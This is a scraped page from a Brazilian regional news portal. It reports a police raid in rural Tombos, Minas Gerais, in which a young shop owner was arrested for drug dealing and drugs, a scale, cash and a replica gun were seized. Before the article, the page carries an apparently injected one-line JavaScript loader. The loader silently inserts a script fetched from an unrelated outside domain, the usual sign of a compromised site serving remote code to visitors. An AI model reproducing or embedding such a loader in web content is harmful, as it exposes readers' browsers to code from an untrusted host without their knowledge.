;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Operação de combate e repressão ao tráfico é deflagrada na Zona Rural de Tombos. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Operação de combate e repressão ao tráfico é deflagrada na Zona Rural de Tombos.

Na manhã desta quinta-feira (27), a Polícia Civil, em ação conjunta com a Polícia Militar, deslocou-se até o distrito de Catuné, Zona Rural de Tombos, onde deu cumprimento a um mandado de busca e apreensão em desfavor de um homem de 23 anos, morador e proprietário de um estabelecimento comercial naquele distrito. Durante a operação, o homem foi preso e os policiais também realizaram a apreensão de uma balança de precisão mecânica – destinada para pesar drogas ilícitas-, dois papelotes de cocaína, que estavam escondidos na geladeira, embalagens plásticas, um pacote aberto de farinha de trigo, usualmente utilizado para misturar com cocaína, a quantia de R$740, além de um simulacro de arma de fogo de uso restrito.

De acordo com o delegado Diêgo Candian Alves, as denúncias anônimas davam conta de que o investigado traficava entorpecentes, sobretudo, nos finais de semana e utilizava seu estabelecimento para a prática da mercancia ilícita. Segundo ele, durante as buscas e o registro da ocorrência, diversos moradores parabenizaram e agradeceram a Polícia pelo trabalho. “Pois estava insuportável a comercialização desenfreada de drogas ilícitas naquele comércio, tendo como consumidores, inclusive, crianças e adolescentes”, disse.

A operação conjunta foi coordenada pelo delegado da comarca, Dr. Diêgo Candian Alves, e pelo comandante do pelotão de Tombos, tenente João Baptista. As operações de combate e repressão ao tráfico de entorpecentes em Tombos e Pedra Dourada continuam.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.